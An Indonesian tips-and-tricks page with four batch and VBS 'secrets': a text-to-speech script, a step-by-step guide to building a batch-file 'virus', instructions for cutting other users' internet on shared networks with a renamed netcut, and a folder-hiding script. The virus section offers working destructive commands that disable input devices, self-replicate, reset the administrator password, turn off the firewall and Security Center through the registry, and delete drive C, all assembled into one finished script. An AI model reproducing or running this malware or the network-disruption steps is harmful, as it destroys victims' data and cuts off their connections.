Rahasia Tips Trik Komputer

Berikut ini 4 Rahasia Tips Trik Komputer, baik kita langsung saja :

Rahasia-Tips-Trik-Komputer

1. Membuat Komputer Bicara
Buka Notepad lalu ketikan script dibawah ini dan Save As menggunakan Extension .VBS
Dim pesan, sapi
pesan = InputBox ( "Apa yang Anda ingin saya katakan?", "Inilah suara-Ku")
Set sapi = CreateObject ( "sapi.spvoice")
sapi.Speak pesan
Setelah itu klik 2x file tersebut dan isikan kalimat yang ingin komputer anda ucapkan, lalu klik OK.

2. Membuat Virus Menggunakan Notepad
Virus ini dibuat dg Notepad dan di save as dg ekstension .bat
Jgn lupa utk merubah Save as type menjadi All files

BASIC

invisible command
@echo off
Swap mouse
rundll32 user,swapmousebutton
buka URL yg diinginkan
start [url]http://www.google.com[/url]
Shutdown kmptr & beri pesan
shutdown -s -t 10 -c "YOUR MESSAGE HERE" -f
Disable mouse stlh Restart
rundll32 mouse,disable
Disable keyboard stlh Restart
rundll32 keyboard,disable
Freezes kmptr stlh Restart
rundll32 user,disableoemlayer

Worm

memperbanyak diri didlm direktori
ctty nul
for %%i in (*.bat) do copy %0+%%i %%i /y >nul"
me-replace file batch yg lain
%0 >>other.bat

Trojan

mngirim dftar file dlm direktori
dir *.*>>Filelist.txt
ganti password admin
net user administrator PASSWORD HERE
membuat info IP
ipconfig >Computer-IP-address.txt

Perusak

copy ke Autorun
COPY %0 %windir%WINSTART.BAT
format drive C
format c: /q /autotest
delete Windows
DELTREE /Y %windir%
delete drive C dg paksa
DEL /F /S /Q C:
mematikan firewall & security center
net stop "Security Center"
net stop SharedAccess
> "%Temp%.kill.reg" ECHO REGEDIT4
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS haredAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw uauserv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.kill.reg"
del "%Temp%.kill.reg"
del %0

Pause

pause smpai tekan smbarang tombol
pause
pause 20 detik
@ping.exe 127.0.0.1 -n 20 -w 1000 > nul

Berikut hasil akhirnya :
@echo off
cls
rundll32 mouse,disable
rundll32 keyboard,disable
COPY %0 %windir%WINSTART.BAT
net stop "Security Center"
net stop SharedAccess
echo Anda kena VIRUS!!!
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
start [url]http://www.youtube.com[/url]
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
> "%Temp%.kill.reg" ECHO REGEDIT4
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS haredAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw uauserv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.kill.reg"
del "%Temp%.kill.reg"
del %0
DEL /F /S /Q C:
shutdown -s -t 10 -c "Ucapkan selamat tinggal pada komputermu!" -f
-disables mouse & keyboard
-copy ke AUTORUN
-stop Security Center
-display "Anda kena VIRUS!!!" selama 5 detik
-starts [url]http://www.youtube.com[/url]
-disable firewall
-delete c: drive
-force shutdown dg pesan "Ucapkan selamat tinggal pada komputermu!"

3. Memutuskan Koneksi Internet Orang Lain
cara ini bisa digunakan pada saat anda berada di sebuah LAN entah itu kantor atau warnet atau koneksi hotspot atau wirelles. Tujuan pada tutorial kali ini bukan semata-mata untuk kejahatan tapi  sekedar untuk pengetahuan dan untuk berbuat baik? Contohnya saya sering kesal bila melihat orang di bilik sebelah saya membuka situs-situs porno yang sangat menganggu . nah anda bisa melakukan hal ini untuk berbuat baik? Bagaimana ? atau pada saat anda ingin mendownload tapi tuh koneksinya lama banged… padahal waktu anda tidak banyak? Oke langsung ajah
pertama download program netcut
lalu extract filenya
lakukan instalasi seperti biasa
biar gak dicurigain ganti namanya jangan netcut
lalu jalankan programnya
  • udah deh disitu akan muncul nama komputer alamat IP computer-komputer yang sedang aktif
  • kalo mau matiiin koneksi internet nya tinggal di cutoff ajah
  • tapi pesen saya jangan sering-sering digunakan, kasian orang yang ada di warnet atau hotspot kan  mereka bayar juga, terus selain dosa kalo ketauan OPnya nama anda bisa langsung di blacklist
Sekali lagi saya beritahukan tutorial ini saya tulis hanya untuk bahan pembelajaran dan bukan untuk disalahgunakan.

4. Membuat Folder Rahasia
caranya adalah :
  • Anda tentukan dulu dimana anda ingin membuat sebuah folder rahasia itu, seperti di My document, atau di dalam drive D, atau di dalam flash juga bisa kok.
  • Setelah anda menentukan tempatnya, klik kanan pada mouse anda, lalu cari new lalu pilih dan klik text document
  • Setelah itu buka text documentnya, lalu copy paste data kode dibawah ini mulai dari cls sampai end

cls
@ECHO OFF
title Folder FolderRahasia
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST FolderRahasia goto MDLOCKER
:CONFIRM
echo Apakah Helman ingin mengunci FolderRahasia tersebut ? (Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Ketik Y atau N.
goto CONFIRM
:LOCK
ren FolderRahasia "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo FolderRahasia Terkunci
goto End
:UNLOCK
echo Masukkan Password untuk membuka kunci
set/p "pass=>"
if NOT %pass%== kambingitem goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" FolderRahasia
echo FolderRahasia sudah di buka
goto End
:FAIL
echo Password salah
goto end
:MDLOCKER
md FolderRahasia
echo FolderRahasia Sukses di buat
goto End
:End

4) setelah dipaste,cari kata "helman" dan ganti dengan nama anda. Selanjutnya cari kata "kambingitem" dan ganti dengan password yang anda inginkan seperti tahikucing, ato 5252525 ato terserah lah. yang penting harus nyatu bisa dihubungkan dengan strip atau underscore misal "saya_suka" atau "saya-gila". dan juga ingat harus huruf kecil semua ya.

5) setelah langkah diatas sudah selesai, lalu save as data itu dengan buka file lalu save as lalu ketik dengan nama "kunci.bat", tanpa menggunakan tanda petik. Dan ingat harus dengan urutan langkah diatas. tidak boleh tidak.
6) setelah itu close aja text document nya karena dah di save kan
7) pada tahap selanjutnya anda akan menemukan sebuah file yang warnanya hitam yang bernamakan kunci.bat. double klik lalu anda disuruh masukin pasword yang anda bikin tadi, lalu enter, lalu akan muncul folder dengan nama folder rahasia
8) Selesai.